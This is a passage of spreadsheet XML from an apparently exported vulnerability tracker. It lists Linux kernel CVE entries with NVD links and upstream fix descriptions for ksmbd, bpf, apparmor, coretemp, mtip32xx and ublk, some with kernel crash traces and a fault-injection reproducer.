[ 1236.609287] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-debian-1.17.0-1 04/01/2014
[ 1236.609498] Workqueue: ib-comp-wq ib_cq_poll_work
[ 1236.609525] Call Trace:
[ 1236.609536]  &lt;TASK&gt;
[ 1236.609545]  __dump_stack+0x21/0x60
[ 1236.609562]  dump_stack_lvl+0xc2/0x100
[ 1236.609573]  print_address_description+0x77/0x200
[ 1236.609587]  ? ib_cq_poll_work+0xd0/0x1a0
[ 1236.609597]  print_report+0x58/0x70
[ 1236.609607]  kasan_report+0x117/0x150
[ 1236.609623]  ? ib_cq_poll_work+0xd0/0x1a0
[ 1236.609636]  ? process_scheduled_works+0x954/0x1600
[ 1236.609650]  ib_cq_poll_work+0xd0/0x1a0
[ 1236.609662]  ? process_scheduled_works+0x954/0x1600
[ 1236.609674]  process_scheduled_works+0xc22/0x1600
[ 1236.609698]  ? __pfx_process_scheduled_works+0x10/0x10
[ 1236.609713]  ? __pfx_assign_work+0x10/0x10
[ 1236.609726]  ? lock_is_held_type+0x7b/0x110
[ 1236.609741]  worker_thread+0x975/0xee0
[ 1236.609757]  ? __pfx_do_raw_spin_lock+0x10/0x10
[ 1236.609775]  ? __kthread_parkme+0x21e/0x260
[ 1236.609789]  kthread+0x3a6/0x490
[ 1236.609800]  ? __pfx_worker_thread+0x10/0x10
[ 1236.609809]  ? __pfx_kthread+0x10/0x10
[ 1236.609820]  ret_from_fork+0x55a/0xa20
[ 1236.609835]  ? __pfx_ret_from_fork+0x10/0x10
[ 1236.609850]  ? __pfx_kthread+0x10/0x10
[ 1236.609861]  ret_from_fork_asm+0x1a/0x30
[ 1236.609880]  &lt;/TASK&gt;
[ 1236.609886]
[ 1236.661292] Allocated by task 5076:
[ 1236.662640]  kasan_save_track+0x3e/0x80
[ 1236.663842]  __kasan_kmalloc+0x72/0x90
[ 1236.664763]  __kmalloc_noprof+0x2b0/0x5d0
[ 1236.665356]  __ib_alloc_cq+0x284/0x1000
[ 1236.666573]  __ib_alloc_cq_any+0x23e/0x340
[ 1236.668654]  smbdirect_connection_create_qp+0x6f7/0x1070
[ 1236.669757]  smbdirect_accept_connect_request+0x500/0x1ca0
[ 1236.672625]  smbdirect_listen_rdma_event_handler+0x1655/0x1c50
[ 1236.673930]  cma_listen_handler+0x1bf/0x260
[ 1236.674923]  cma_cm_event_handler+0x128/0x380
[ 1236.676926]  cma_ib_req_handler+0x2d3d/0x4de0
[ 1236.678368]  cm_process_work+0xb0/0x530
[ 1236.680454]  cm_queue_work_unlock+0xb1/0x230
[ 1236.681673]  cm_work_handler+0x969f/0xdca0
[ 1236.682704]  process_scheduled_works+0xc22/0x1600
[ 1236.683447]  worker_thread+0x975/0xee0
[ 1236.685901]  kthread+0x3a6/0x490
[ 1236.688164]  ret_from_fork+0x55a/0xa20
[ 1236.689522]  ret_from_fork_asm+0x1a/0x30
[ 1236.690073]
[ 1236.690378] Freed by task 5137:
[ 1236.692242]  kasan_save_track+0x3e/0x80
[ 1236.694272]  kasan_save_free_info+0x40/0x50
[ 1236.695514]  __kasan_slab_free+0x3a/0x60
[ 1236.696773]  kfree+0x14e/0x4e0
[ 1236.697216]  ib_destroy_cq_user+0x18d/0x250
[ 1236.699817]  smbdirect_connection_destroy_qp+0xf2/0x280
[ 1236.702115]  smbdirect_socket_destroy_sync+0x1607/0x2720
[ 1236.704062]  smbdirect_socket_release+0x140/0x280
[ 1236.705286]  smb_direct_free_transpor
---truncated---</t>
        </is>
      </c>
      <c r="T541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90173</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90174</t>
        </is>
      </c>
      <c r="D542" s="5" t="inlineStr"/>
      <c r="E542" s="5" t="inlineStr"/>
      <c r="F542" s="5" t="inlineStr"/>
      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="inlineStr"/>
      <c r="I542" s="5" t="inlineStr"/>
      <c r="J542" s="5" t="inlineStr"/>
      <c r="K542" s="5" t="inlineStr"/>
      <c r="L542" s="5" t="inlineStr"/>
      <c r="M542" s="5" t="inlineStr"/>
      <c r="N542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O542" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P542" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q542" s="5" t="inlineStr"/>
      <c r="R542" s="5" t="inlineStr"/>
      <c r="S542" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix slab-out-of-bounds read in ksmbd_alloc_user()
ksmbd_alloc_user() copies resp-&gt;hash_sz bytes out of the mountd IPC
login response with
	user-&gt;passkey_sz = resp-&gt;hash_sz;
	user-&gt;passkey = kmalloc(resp-&gt;hash_sz, KSMBD_DEFAULT_GFP);
	if (user-&gt;passkey)
		memcpy(user-&gt;passkey, resp-&gt;hash, resp-&gt;hash_sz);
resp-&gt;hash_sz is a __u16 supplied by the response, but resp-&gt;hash[] is
only KSMBD_REQ_MAX_HASH_SZ bytes.  A malformed or malicious login
response can set hash_sz well beyond that (up to 65535), so the memcpy()
reads past the end of the response object.  ipc_validate_msg() does not
bound hash_sz, so reject any response whose hash_sz exceeds the on-stack
hash[] buffer before allocating and copying.
[ 2030.238706] BUG: KASAN: slab-out-of-bounds in ksmbd_alloc_user+0x278/0x680
[ 2030.240549] Read of size 65535 at addr ffff888121bb6680 by task kworker/4:1/18611
[ 2030.242296]
[ 2030.242710] CPU: 4 UID: 0 PID: 18611 Comm: kworker/4:1 Not tainted 7.1.0-next-20260623-virtme #96 PREEMPT(lazy)
[ 2030.242732] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-debian-1.17.0-1 04/01/2014
[ 2030.242743] Workqueue: ksmbd-io handle_ksmbd_work
[ 2030.242763] Call Trace:
[ 2030.242769]  &lt;TASK&gt;
[ 2030.242776]  dump_stack_lvl+0xa2/0xd0
[ 2030.242794]  print_address_description+0x77/0x200
[ 2030.242815]  ? ksmbd_alloc_user+0x278/0x680
[ 2030.242831]  print_report+0x58/0x70
[ 2030.242848]  kasan_report+0x117/0x150
[ 2030.242869]  ? ksmbd_alloc_user+0x278/0x680
[ 2030.242888]  kasan_check_range+0x3c7/0x3f0
[ 2030.242908]  ? ksmbd_alloc_user+0x278/0x680
[ 2030.242925]  __asan_memcpy+0x29/0x70
[ 2030.242942]  ksmbd_alloc_user+0x278/0x680
[ 2030.242960]  ksmbd_login_user+0xc3/0x120
[ 2030.242978]  ntlm_authenticate+0x5e6/0x1b00
[ 2030.243017]  ? __pfx_ntlm_authenticate+0x10/0x10
[ 2030.243035]  ? ksmbd_session_lookup+0x188/0x1d0
[ 2030.243054]  ? __pfx_ksmbd_session_lookup+0x10/0x10
[ 2030.243090]  ? __sanitizer_cov_trace_switch+0x7b/0x140
[ 2030.243108]  smb2_sess_setup+0x1e4a/0x27b0
[ 2030.243126]  ? copy_from_kernel_nofault+0x199/0x300
[ 2030.243156]  ? __pfx_smb2_sess_setup+0x10/0x10
[ 2030.243173]  ? get_smb2_cmd_val+0xe3/0x1c0
[ 2030.243208]  handle_ksmbd_work+0x954/0x1280
[ 2030.243230]  ? __pfx_handle_ksmbd_work+0x10/0x10
[ 2030.243249]  ? process_scheduled_works+0xa07/0x1490
[ 2030.243270]  ? process_scheduled_works+0xa07/0x1490
[ 2030.243291]  process_scheduled_works+0xa70/0x1490
[ 2030.243320]  ? __pfx_process_scheduled_works+0x10/0x10
[ 2030.243340]  ? do_raw_spin_lock+0x130/0x300
[ 2030.243358]  ? lock_is_held_type+0x7b/0x110
[ 2030.243388]  worker_thread+0x932/0xe20
[ 2030.243415]  kthread+0x38a/0x470
[ 2030.243431]  ? __pfx_worker_thread+0x10/0x10
[ 2030.243451]  ? __pfx_kthread+0x10/0x10
[ 2030.243467]  ret_from_fork+0x484/0x910
[ 2030.243485]  ? __pfx_ret_from_fork+0x10/0x10
[ 2030.243501]  ? __switch_to+0xc77/0x12c0
[ 2030.243523]  ? __pfx_kthread+0x10/0x10
[ 2030.243540]  ret_from_fork_asm+0x1a/0x30
[ 2030.243564]  &lt;/TASK&gt;
[ 2030.243570]
[ 2030.290164] Allocated by task 19279:
[ 2030.290911]  kasan_save_track+0x3e/0x80
[ 2030.292179]  __kasan_kmalloc+0x72/0x90
[ 2030.293217]  __kvmalloc_node_noprof+0x3ff/0x6b0
[ 2030.294467]  handle_generic_event+0x59b/0x750
[ 2030.295345]  genl_family_rcv_msg_doit+0x238/0x340
[ 2030.296553]  genl_rcv_msg+0x606/0x7b0
[ 2030.297129]  netlink_rcv_skb+0x22b/0x4a0
[ 2030.298500]  genl_rcv+0x2d/0x40
[ 2030.299273]  netlink_unicast+0x7ba/0x930
[ 2030.300019]  netlink_sendmsg+0x8c3/0xb00
[ 2030.301073]  __sock_sendmsg+0xec/0x140
[ 2030.301579]  __sys_sendto+0x357/0x470
[ 2030.302255]  __x64_sys_sendto+0xe3/0x100
[ 2030.303425]  do_syscall_64+0x135/0x460
[ 2030.304763]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 2030.305594]
[ 2030.305819] The buggy address belongs to the object at ffff888121bb6640
[ 2030.305819]  which belongs to the cache kmalloc-192 of size 192
[ 2030.309595] The buggy address 
---truncated---</t>
        </is>
      </c>
      <c r="T542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90174</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90175</t>
        </is>
      </c>
      <c r="D543" s="5" t="inlineStr"/>
      <c r="E543" s="5" t="inlineStr"/>
      <c r="F543" s="5" t="inlineStr"/>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="inlineStr"/>
      <c r="I543" s="5" t="inlineStr"/>
      <c r="J543" s="5" t="inlineStr"/>
      <c r="K543" s="5" t="inlineStr"/>
      <c r="L543" s="5" t="inlineStr"/>
      <c r="M543" s="5" t="inlineStr"/>
      <c r="N543" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O543" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P543" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q543" s="5" t="inlineStr"/>
      <c r="R543" s="5" t="inlineStr"/>
      <c r="S543" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: server: fix leak of ksmbd_ipc_login_request_ext() returned buffer
Free it unconditionally after ksmbd_alloc_user() calls.
kmemleak splat:
  unreferenced object 0xffff888103b83540 (size 192):
    comm "pool-0", pid 16970, jiffies 4377290937
    hex dump (first 32 bytes):
      00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00  ................
      00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    backtrace (crc 408ccc66):
      __kvmalloc_node_noprof+0x730/0x920
      handle_generic_event+0xec/0x1a0 [ksmbd]
      genl_family_rcv_msg_doit+0xe0/0x130
      genl_rcv_msg+0x181/0x290
      netlink_rcv_skb+0x4f/0x100
      genl_rcv+0x28/0x40
      netlink_unicast+0x1e6/0x2c0
      netlink_sendmsg+0x20a/0x450
      ____sys_sendmsg+0x2e8/0x310
      ___sys_sendmsg+0x78/0xc0
      __sys_sendmsg+0x63/0xc0
      do_syscall_64+0xa1/0x670
      entry_SYSCALL_64_after_hwframe+0x76/0x7e</t>
        </is>
      </c>
      <c r="T543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90175</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90176</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2026-09-17</t>
        </is>
      </c>
      <c r="P544" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q544" s="5" t="inlineStr"/>
      <c r="R544" s="5" t="inlineStr"/>
      <c r="S544" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: Do not skip lock checks for single-byte ranges
check_lock_range() uses inclusive ranges. Its callers pass the end
offset as start + length - 1, so start == end represents a valid
single-byte range rather than an empty range.
The start == end shortcut therefore skips mandatory byte-range lock
checks for one-byte reads, writes, copychunk operations and one-byte
truncate ranges. A conflicting lock covering that byte is not checked
and the operation is allowed to proceed.
Remove the shortcut. The truncate size == inode-&gt;i_size case is already
handled by only calling check_lock_range() when the new size differs
from the current file size.</t>
        </is>
      </c>
      <c r="T544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90176</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90177</t>
        </is>
      </c>
      <c r="D545" s="5" t="inlineStr"/>
      <c r="E545" s="5" t="inlineStr"/>
      <c r="F545" s="5" t="inlineStr"/>
      <c r="G545" s="5" t="inlineStr"/>
      <c r="H545" s="5" t="inlineStr"/>
      <c r="I545" s="5" t="inlineStr"/>
      <c r="J545" s="5" t="inlineStr"/>
      <c r="K545" s="5" t="inlineStr"/>
      <c r="L545" s="5" t="inlineStr"/>
      <c r="M545" s="5" t="inlineStr"/>
      <c r="N545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O545" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P545" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q545" s="5" t="inlineStr"/>
      <c r="R545" s="5" t="inlineStr"/>
      <c r="S545" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Check pointer type for all atomic RMW paths
Atomic RMW verification records an instruction pointer type only when the
current destination is PTR_TO_ARENA. A second path can therefore reach the
same instruction with an ordinary pointer without comparing it against the
saved arena type.
The post-verification fixup uses the saved type to rewrite the instruction
to BPF_PROBE_ATOMIC for every path. Record the actual destination type for
all atomic RMW paths so the existing mismatch check rejects incompatible
uses of one instruction.</t>
        </is>
      </c>
      <c r="T545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90177</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90178</t>
        </is>
      </c>
      <c r="D546" s="5" t="inlineStr"/>
      <c r="E546" s="5" t="inlineStr"/>
      <c r="F546" s="5" t="inlineStr"/>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="inlineStr"/>
      <c r="I546" s="5" t="inlineStr"/>
      <c r="J546" s="5" t="inlineStr"/>
      <c r="K546" s="5" t="inlineStr"/>
      <c r="L546" s="5" t="inlineStr"/>
      <c r="M546" s="5" t="inlineStr"/>
      <c r="N546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O546" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P546" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q546" s="5" t="inlineStr"/>
      <c r="R546" s="5" t="inlineStr"/>
      <c r="S546" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwmon: (coretemp) Fix core_data leak on CPUs without PTS
pdata-&gt;core_data is allocated in init_temp_data() when the first core
temp_data of a package is created, but it is only released from
destroy_temp_data(), and only in the branch that handles the package
temp_data.
Package temp_data is created solely when the CPU supports
X86_FEATURE_PTS. On a CPU without it, coretemp_cpu_online() never calls
coretemp_add_core() with pkg_flag set, so pdata-&gt;pkg_data stays NULL.
coretemp_cpu_offline() then skips the removal of the package interface,
destroy_temp_data() is never called for package data, and the array is
still allocated when coretemp_device_remove() frees the platform data
that pointed at it.
Release the array in coretemp_device_remove(). destroy_temp_data() sets
pdata-&gt;core_data to NULL when it frees it, so the added kfree() is a
no-op on CPUs that do have PTS.
Tested on an Intel Core i5-1135G7. The driver was instrumented to log
every allocation and release of pdata-&gt;core_data, and the PTS check in
coretemp_cpu_online() was patched out to emulate a CPU without package
thermal support. Without this change the array was allocated and never
released, and coretemp_device_remove() still saw a non-NULL pointer.
With it the array is released and the pointer accounting balances. On an
unmodified build the release still happens via the package temp_data and
the added kfree() sees NULL, with no slab warnings over repeated module
load and unload cycles.</t>
        </is>
      </c>
      <c r="T546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90178</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90179</t>
        </is>
      </c>
      <c r="D547" s="5" t="inlineStr"/>
      <c r="E547" s="5" t="inlineStr"/>
      <c r="F547" s="5" t="inlineStr"/>
      <c r="G547" s="5" t="inlineStr"/>
      <c r="H547" s="5" t="inlineStr"/>
      <c r="I547" s="5" t="inlineStr"/>
      <c r="J547" s="5" t="inlineStr"/>
      <c r="K547" s="5" t="inlineStr"/>
      <c r="L547" s="5" t="inlineStr"/>
      <c r="M547" s="5" t="inlineStr"/>
      <c r="N547" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O547" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P547" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q547" s="5" t="inlineStr"/>
      <c r="R547" s="5" t="inlineStr"/>
      <c r="S547" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix deadlock in complain-mode change_hat
The use of change_hat when in complain mode can cause a deadlock
when the hat doesn't exist and a new learning profile is created
for the missing profile. This is because change_hat() has taken
the lock to search the hat list and creating the new learning
profile needs to take the lock to add it to the list.
From the bug report:
Originally found in 7.0.0 in LTS ubuntu 26.04 with pam_apparmor + su
in complain mode set to change hats.  Then verified in newest
available vanilla kernel I've compiled to see if still present:
7.2-rc7 vanilla -&gt; affected
checked also some other kernels:
6.18.44 vanilla -&gt; affected
6.12.95 with debian patches -&gt; unaffected
On systems without bug (for example 6.12.95 debian) it just prints:
aa_change_hat rc=0
On systems with bug, the executable always hangs, prints nothing and
becomes unkillable.  (And once stuck this way, it will cause any
further hat changes to also cause the changing process to get stuck)
Then in syslog you can find hint about cause:
kernel: INFO: task hat:3409 blocked for more than 483 seconds.
kernel:       Not tainted 7.2.0-rc7 #1
kernel: "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message.
kernel: task:hat             state:D stack:0     pid:3409  tgid:3409  ppid:2605   task_flags:0x400000 flags:0x00080800
kernel: Call Trace:
kernel:  &lt;TASK&gt;
kernel:  __schedule+0x48f/0xfe0
kernel:  schedule+0x27/0xa0
kernel:  schedule_preempt_disabled+0x15/0x30
kernel:  __mutex_lock.constprop.0+0x569/0xa10
kernel:  aa_new_learning_profile+0x15f/0x210
kernel:  build_change_hat+0x19f/0x3b0
kernel:  change_hat.isra.0+0x5dd/0xd60
kernel:  aa_change_hat+0x2f3/0x710
kernel:  aa_setprocattr_changehat+0x121/0x1f0
kernel:  do_setattr+0x28c/0x340
kernel:  apparmor_setselfattr+0x20/0x50
kernel:  security_setselfattr+0xf6/0x110
kernel:  __x64_sys_lsm_set_self_attr+0x53/0x90
kernel:  do_syscall_64+0xdd/0x5e0
kernel:  ? __mod_memcg_lruvec_state+0xfd/0x260
kernel:  ? lruvec_stat_mod_folio+0x8d/0xd0
kernel:  ? __folio_mod_stat+0x2d/0x90
kernel:  ? map_anon_folio_pte_nopf+0xd1/0x1f0
kernel:  ? do_anonymous_page+0x184/0xa10
kernel:  ? __handle_mm_fault+0x805/0x870
kernel:  ? count_memcg_events+0xef/0x230
kernel:  ? handle_mm_fault+0x1f0/0x2f0
kernel:  ? do_user_addr_fault+0x2bb/0x7b0
kernel:  ? do_syscall_64+0x94/0x5e0
kernel:  ? exc_page_fault+0x75/0x160
kernel:  entry_SYSCALL_64_after_hwframe+0x76/0x7e
kernel: RIP: 0033:0x7f815e134c8d
kernel: RSP: 002b:00007fff6df94ea8 EFLAGS: 00000246 ORIG_RAX: 00000000000001cc
kernel: RAX: ffffffffffffffda RBX: 0000556d8c81d040 RCX: 00007f815e134c8d
kernel: RDX: 0000000000000046 RSI: 0000556d8c81d040 RDI: 0000000000000064
kernel: RBP: 00007fff6df94ef0 R08: 00007f815e212ac8 R09: 000000000000000c
kernel: R10: 0000000000000000 R11: 0000000000000246 R12: 0000556d8c81d010
kernel: R13: 0000000000000026 R14: 0000000000000046 R15: 0000000000000064
kernel:  &lt;/TASK&gt;
kernel: INFO: task hat:3409 is blocked on a mutex likely owned by task hat:3409.
To fix the issue, lift the locking out of the core of
aa_new_learning_profile(), introduce a wrapper function that takes the
lock where needed, and have build_change_hat() call the core function
that no longer takes the lock.
In addition fix 4 other issues introduced by commit
32e92764d6f8d ("apparmor: grab ns lock and refresh when looking up changehat child profiles")
- aa_get_profile_rcu() was replaced-by: aa_get_profile without the
  accompanying rcu_dereference_protected()
- an extra aa_get_label(label) was introduced at the start of
  change_hat() without an accompanying aa_put_label() causing a
  reference count leak.
- a reference count leak was introduced in the label_is_stale(label)
  case, where the newest profile would be leaked instead of the
  label passed to the function.
- a potential UAF when the lookup walks up the tree with new_ns != ns
  the new label refere
---truncated---</t>
        </is>
      </c>
      <c r="T547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90179</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90180</t>
        </is>
      </c>
      <c r="D548" s="5" t="inlineStr"/>
      <c r="E548" s="5" t="inlineStr"/>
      <c r="F548" s="5" t="inlineStr"/>
      <c r="G548" s="5" t="inlineStr"/>
      <c r="H548" s="5" t="inlineStr"/>
      <c r="I548" s="5" t="inlineStr"/>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr"/>
      <c r="L548" s="5" t="inlineStr"/>
      <c r="M548" s="5" t="inlineStr"/>
      <c r="N548" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O548" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P548" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q548" s="5" t="inlineStr"/>
      <c r="R548" s="5" t="inlineStr"/>
      <c r="S548" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
block: mtip32xx: synchronize ioctls with device removal
The ioctl handlers only test REMOVE_PENDING before entering
mtip_hw_ioctl(). Removal can set that bit immediately afterwards and free
dd-&gt;port in mtip_hw_exit() while an ioctl still dereferences it. An already
open block device can reach the handlers while del_gendisk() is in
progress.
Serialize both native and compat ioctls with removal. Set REMOVE_PENDING
before taking the mutex so new callers fail after an in-flight ioctl has
drained, and hold the mutex until the port has been torn down.</t>
        </is>
      </c>
      <c r="T548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90180</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90181</t>
        </is>
      </c>
      <c r="D549" s="5" t="inlineStr"/>
      <c r="E549" s="5" t="inlineStr"/>
      <c r="F549" s="5" t="inlineStr"/>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="inlineStr"/>
      <c r="I549" s="5" t="inlineStr"/>
      <c r="J549" s="5" t="inlineStr"/>
      <c r="K549" s="5" t="inlineStr"/>
      <c r="L549" s="5" t="inlineStr"/>
      <c r="M549" s="5" t="inlineStr"/>
      <c r="N549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O549" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P549" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q549" s="5" t="inlineStr"/>
      <c r="R549" s="5" t="inlineStr"/>
      <c r="S549" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ublk: avoid teardown retry loop on xarray allocation failure
__ublk_shmem_remove_ranges() removes matching maple tree ranges in
batches, but first stores each range into a temporary xarray so that the
pages can be unpinned after dropping the maple tree lock.
That temporary xarray is filled under the maple tree lock with
xa_store(..., GFP_ATOMIC). If the store fails before mas_erase(), the
current range is left in the tree and the helper returns false. The
outer ublk_shmem_remove_ranges() loop then immediately retries the same
range. While the atomic allocation keeps failing, the teardown path has
no forward progress.
The issue can be reproduced with radix_tree_node failslab injection after
a SHMEM_ZC buffer has already been registered:
  # Kernel config:
  #   CONFIG_BLK_DEV_UBLK=y
  #   CONFIG_DEBUG_FS=y
  #   CONFIG_FAULT_INJECTION=y
  #   CONFIG_FAULT_INJECTION_DEBUG_FS=y
  #   CONFIG_FAILSLAB=y
  echo 10 &gt; /proc/sys/vm/nr_hugepages
  mkdir -p /tmp/htlb
  mount -t hugetlbfs none /tmp/htlb
  fallocate -l 4M /tmp/htlb/ublk_buf
  dev_id=$(kublk add -t null --shmem_zc \
		--htlb /tmp/htlb/ublk_buf |
	   awk -F '[ :]' '/dev id/ {print $3}')
  echo 1 &gt; /sys/kernel/slab/radix_tree_node/failslab
  echo Y &gt; /sys/kernel/debug/failslab/cache-filter
  echo Y &gt; /sys/kernel/debug/failslab/ignore-gfp-wait
  echo 1 &gt; /sys/kernel/debug/failslab/interval
  echo -1 &gt; /sys/kernel/debug/failslab/times
  echo 100 &gt; /sys/kernel/debug/failslab/probability
  kublk del -n "$dev_id"
On the unfixed kernel the delete command was still running after 3
seconds. Disabling failslab made it return. The fault-injection stack
showed:
  should_failslab
  kmem_cache_alloc_lru_noprof
  __xas_nomem
  __xa_store
  xa_store
  __ublk_shmem_remove_ranges
  ublk_cdev_rel
  ublk_ctrl_del_dev
Remove the allocation from the teardown loop. Keep the existing batch
limit, but collect {base_pfn, nr_pages} pairs in a fixed-size stack array.
Once a matching range is found, the range is erased from the maple tree
before dropping the lock, so each successful scan makes progress without
depending on any GFP_ATOMIC allocation.
With the same failslab settings, the fixed kernel completed
"kublk del -n $dev_id" successfully in about 45 ms.</t>
        </is>
      </c>
      <c r="T549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90181</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90182</t>
        </is>
      </c>
      <c r="D550" s="5" t="inlineStr"/>
      <c r="E550" s="5" t="inlineStr"/>
      <c r="F550" s="5" t="inlineStr"/>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="inlineStr"/>
      <c r="I550" s="5" t="inlineStr"/>
      <c r="J550" s="5" t="inlineStr"/>
      <c r="K550" s="5" t="inlineStr"/>
      <c r="L550" s="5" t="inlineStr"/>
      <c r="M550" s="5" t="inlineStr"/>
      <c r="N550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O550" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P550" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q550" s="5" t="inlineStr"/>
